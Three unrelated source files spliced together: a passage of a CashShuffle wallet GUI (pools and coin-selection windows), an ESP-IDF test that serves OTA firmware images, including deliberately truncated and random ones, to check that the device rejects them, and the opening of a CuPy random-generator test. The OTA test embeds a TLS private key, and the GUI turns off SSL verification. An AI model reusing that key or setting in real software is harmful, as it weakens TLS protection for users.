self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances timer will not fire after object deletion due to PyQt5 singal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within in a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# No. of times working of application to be validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: received package is not fit len', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_chunked()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
test_generator.py
|
import functools
import os
import threading
import unittest
import numpy
import pytest
import cupy
from cupy import cuda
from cupy.cuda import runtime
from cupy.random import _generator
from cupy import testing
from cupy.testing import _attr
from cupy.testing import _condition
from cupy.testing import _hypothesis
from cupy_tests.random_tests import common_distributions
def numpy_cupy_equal_continuous_distribution(significance_level, name='xp'):
"""Decorator that tests the distributions of NumPy samples and CuPy ones.
Args:
significance_level (float): The test fails if p-value is lower than
this argument.
name(str): Argument name whose value is either
``numpy`` or ``cupy`` module.
Decorated test fixture is required to return samples from the same
distribution even if ``xp`` is ``numpy`` or ``cupy``.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
kw[name] = cupy
cupy_result = impl(self, *args, **kw)
kw[name] = numpy
numpy_result = impl(self, *args, **kw)
assert cupy_result is not None
assert numpy_result is not None
d_plus, d_minus, p_value = \
common_distributions.two_sample_Kolmogorov_Smirnov_test(
cupy.asnumpy(cupy_result), numpy_result)
if p_value < significance_level:
message = '''Rejected null hypothesis:
p: %f
D+ (cupy < numpy): %f
D- (cupy > numpy): %f''' % (p_value, d_plus, d_minus)
raise AssertionError(message)
return test_func
return decorator
def _get_size(size):
# CuPy returns an ndarray of shape () even if size=None.
# cf. NumPy returns a Python scalar if size=None.
if size is None:
return ()
return cupy._core.get_size(size)
class RandomGeneratorTestCase(common_distributions.BaseGeneratorTestCase):
target_method = None
def get_rng(self, xp, seed):
return xp.random.RandomState(seed=seed)
def set_rng_seed(self, seed):
self.rng.seed(seed)
def _xp_random(xp, method_name):
method = getattr(xp.random.RandomState(), method_name)
if xp == cupy:
return method
def f(*args, **kwargs):
dtype = kwargs.pop('dtype', None)
ret = method(*args, **kwargs)
if dtype is not None:
ret = ret.astype(dtype, copy=False)
return ret
return f
@testing.fix_random()
@testing.gpu
class TestRandomState(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def check_seed(self, seed):
rs = self.rs
rs.seed(seed)
xs1 = [rs.uniform() for _ in range(100)]
rs.seed(seed)
xs2 = [rs.uniform() for _ in range(100)]
rs.seed(seed)
rs.seed(None)
xs3 = [rs.uniform() for _ in range(100)]
# Random state must be reproducible
assert xs1 == xs2
# Random state must be initialized randomly with seed=None
assert xs1 != xs3
@testing.for_int_dtypes()
def test_seed_not_none(self, dtype):
self.check_seed(dtype(0))
@testing.for_dtypes([numpy.complex_])
def test_seed_invalid_type_complex(self, dtype):
with self.assertRaises(TypeError):
self.rs.seed(dtype(0))
@testing.for_float_dtypes()
def test_seed_invalid_type_float(self, dtype):
with self.assertRaises(TypeError):
self.rs.seed(dtype(0))
def test_array_seed(self):
self.check_seed(numpy.random.randint(0, 2**31, size=40))
def test_methods(self):
methods = [
cuda.curand.CURAND_RNG_PSEUDO_DEFAULT,
cuda.curand.CURAND_RNG_PSEUDO_MRG32K3A,
